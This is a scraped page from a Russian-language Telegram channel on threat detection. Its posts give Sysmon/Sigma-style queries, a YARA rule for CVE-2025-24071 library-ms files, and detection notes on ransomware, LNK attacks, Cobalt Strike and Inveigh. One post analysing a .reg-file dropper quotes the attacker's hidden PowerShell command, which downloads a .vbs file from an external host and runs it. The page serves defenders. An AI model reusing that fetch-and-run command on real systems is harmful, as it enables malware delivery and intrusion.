Detection is easy
1.07K subscribers
73 photos
2 videos
8 files
177 links
Download Telegram
Вернемся к теме с шифровальщиками 😱

Часто ransomware меняет раширения зашифрованным файлам или добавляет второе. Если ваши средства не остановили процесс шифрования, то можем попытаться обнаружить создание файла с подозрительным раширением 💻

Список расширений и названий записок можно посмотреть здесь:
🔤 https://github.com/dannyroemhild/ransomware-fileext-list
🔤 https://github.com/mthcht/awesome-lists/blob/main/Lists/ransomware_extensions_list.csv
🔤 https://gist.github.com/sfponce/7c49269ed5a81f2a55dad39dc7cef5ad

⚠️ Событие Sysmon EventId 11, регистрирует только создание нового файла.

Для примера можем посмотреть Sigma-правило, для его работы нужно включить ETW


logman create trace "Microsoft-Windows-Kernel-File" -p Microsoft-Windows-Kernel-File -o "C:\Logs\Microsoft-Windows-Kernel-File.etl"


Можно добавить в конфиг сисмона имена записок и дать название правилу - Ransomware, тогда в событиях создания файла сразу будет отображено, на что стоит обратить внимание.

#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥52👍2
В ряде дроперов пополнение, хакеры используют *.reg-файлы 🩸

reg-файлы позволяют изменить значения ключей реестра.


В этом примере злоумышленники прислали PDF-файл, который содержит ссылку. Перейдя по ней пользователь скачает REG-файл.

При открытии reg-файла событие запуска процесса будет содержать

"regedit.exe" "C:\Users\admin\Downloads\pdf_graphics.reg"  


Данный файл создает ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SystemUpdate со значением

cmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://support.zyfex.free.hr/down/maze.vbs' -OutFile '%TEMP%\maze.vbs'; Start-Process '%TEMP%\maze.vbs


Такое поведение мы можем обнаружить:

🔤 создание процесса
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "regedit.exe" and CommandLine="\.reg($|\s)


🔤 Создание reg-файлов в директориях пользователя
ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and TargetFilename = "?:\Users\.*\.reg"


🔤 Добавим детект на основе ADS NTFS

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and TargetFilename endswith ".reg:Zone.Identifier" and Contents=".*ZoneId=3.*"


Сэмпл в any.run

#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥4👍3😁2
Посмотрим чем ещё страшны LNK
🔥4
📍Расписание докладов ISCRA Talks 2025

14 марта состоится самое долгожданное мероприятие, на котором вас ждем настоящее погружение в мир информационной безопасности!

ISCRA Talks 2025 — конференция, объединяющая всех любителей инфобеза!

📌 Скорей регистрируйся и выбирай темы докладов, которые обязательно посетишь!

https://iscra-talks.ru/#/register
1👍6🔥3🎄2🤔1
Всем привет! ✌️
Вы следите за изменениями в событиях Windows?

О чем я говорю?) При установке обновления от 14 января 2025, Event ID 4768 и 4769 получат новые поля, с которыми мы познакомимся позднее

#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥5🤔2🤩1
Detection is easy
What is LNK.pdf
В продолжение темы с LNK. Исследование TTP APT37 (ScarCruft, Reaper, Red Eyes)

🔤 Атака начинается с фишинга, содержащего ZIP-вложение, которое скрывает LNK
🔤 При выполнении файл LNK запускает multi-stage атаку с bat и PowerShell
🔤 Аргументы LNK проверяют рабочую директорию, затем рекурсивно ищут файл с определенным размером и расширением LNK в директории Temp
🔤 После обнаружения из LNK извлекается 1 hwpx (файл-приманка) и 3 dat-файла
🔤 Далее цепочка из скриптов загружает в память shellcode, для запуска RokRat. Для взаимодействия с C2 использовались API Dropbox, Yandex Disk и PCloud

Для поиска selfextracted-lnk можем похантить в аргументах cmd и powershell, вхождение Temp и LNK

#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3🤔21
Вышел релиз Cobalt Strike 4.11, много интересных изменений. Меня больше зацепило использование DNS over HTTPS (DoH) для взаимодействия с сервером. Готовы к обнаружению?)

Список публичных DoH/DoT резолверов и еще один

Список всех обновлений CS 🐎 можно найти здесь

#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍5🤔2
Очередной NTLM Response disclosure (CVE-2025-24071), вначале было интересно) сейчас хочется верить, что у всех закрыт доступ на внешние smb

Можем обнаружить 🔭:

🔤 В логах Security и Sysmon поискать сессии к порту 445


ProviderName="Microsoft-Windows-Security-Auditing" and EventId=5156 and DestAddress not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestPort=445



ProviderName="Microsoft-Windows-Sysmon" and EventId=3 and DestinationIp not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestinationPort=445


🔤 создание файла с раширением .library-ms


ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName endswith "\\Users\\.*\.library-ms"


🔤 yara имеет смысл поискать в директориях пользователея (проверил, не фолсило)


rule detect_malicious_library_ms {
meta:
description = "Detects library-ms files with a search connector pointing"
author = "@d3f0x0 @detectioneasy"
reference = "CVE-2025-24071"
date = "2025-03-19"
score = 80

strings:
$xml_decl = /<\?xml\s+version\s*=\s*["']1\.0["']\s+encoding\s*=\s*["']UTF-8["']\s*\?>/ nocase

$namespace = "https://schemas.microsoft.com/windows/2009/library"

$url_pattern1 = /<url\b[^>]*>\s*\\\\/ wide ascii
$url_pattern2 = /<\/url>/ wide ascii

$connector_open = "<searchConnectorDescription>" wide ascii
$connector_close = "</searchConnectorDescription>" wide ascii

condition:
all of ($xml_decl, $namespace, $url_pattern1, $url_pattern2 ) and
2 of ($connector_open, $connector_close)
}


#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍3🤔21
привет! ✌️

Что скрывает кричащие название Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns

По информации на 18 марта майкрософт отказались устранять эту уязвимость

Суть уязвимости, что пользователь не сможет посмотреть содержимое команды в lnk через проводник)

Способ не новый и атакующие ранее вставляли пробелы для этого, trendmicro поделилсь еще символами

Серьезно?) много ли людей проверяет файл с иконкой ворда или пдф

В целом если lnk попопал к пользователю и он успешно запустил его, стоит что-то подтюнить)

Эта возможность (by design 🤡) нам никак не мешает, события создадутся, аргументы из событий тоже никуда не денутся

🔤 Обнаружим создание LNK в дирректории пользователя


ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.lnk"


🔤 И добавим детект на основе ADS NTFS


ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and TargetFilename = "?:\Users\.*\.lnk:Zone.Identifier" and Contents=".*ZoneId=3.*"


Про lnk говорили на iscra talks

#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥5👍4
tg_image_3048436523.png
15.9 KB
Знали ли Вы, что названия антивирусных вердиктов это не просто набор фраз?) 🤔

Раньше была схема CARO (Computer Antivirus Research Organization) Naming Scheme, которая определяла формат названия вердикта антивируса

Например для Windows Defender, HackTool:Python/Impacket.BA

🔤 HackTool — тип угрозы (здесь: инструмент для взлома). Другие варианты: Trojan, Worm, Ransom.

🔤 Python — платформа/язык

🔤 Impacket — уникальное имя угрозы

🔤 BA — вариант или модификация детекта

Сейчас у разных вендоров данная схема немного изменена, но все стараются ее придерживаться

Нашел статью в которой автор собрал несколько ссылок с наименованиями вендоров

Понимание схемы названия вердиктов может помочь в приоритезации инцидентов.
За основу можно взять CheatSheet от Florian Roth

#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍4🤯3
Всем привет ✌️
Многими любимый Responder получил свое отражение на Powershell и C# в проекте Inveigh

Атакующие стараются не использовать его plaintext'ом и обфусцируют powershell или используют свой интерпретатор

Если Вам попались ребята, которые просто сделали git clone или скачали Release 👶 , проблем с ними нет

🔭 Обнаруживаем:
🔤 создание файлов с именем Inveigh
🔤 в логах Powershell вхождение inveigh, relay

Если хакеры подготовились обфусцировались, принесли с собой свой интерпретатор powershell:

🔤 Скорее всего оставили стандартное название логов, отслеживаем создание файлов по маскам


$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
$inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"


🔤 если уже сильно запарились, и все поменяли, то формат хранения NTLMv2 Response, вряд ли будут менять, и в целом лог работы программы, поэтому берем строки вывода логов из скрипта формируем в yara и идем в поход по директориям пользователей

🔤 и для самых крутых, отойдем от tool-based, поднимемся выше по пирамиде боли к TTP 🤘

❗️ Суть атаки авторизовать на себя как можно больше хостов, для этого нужно поднять определенные сервера и заставить других клиентов подключаться к себе

Скорее всего подобного рода утилиты будут применяться в начале killchain для сбора учетных записей и информации об окружающей среде. Это дает нам вариант для профилирования поведения хостов.

🔤 Если у вас увеличилось количество подключений к хосту или в целом забиндились новые порты на пользовательских тачках - стоит проверить процесс, к которому подключаются.

🔤 Или наоборот, если хосты в широковещательном домене начали неожиданно подключаться к одному из хостов - необходимо его проверить

#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍5🥰31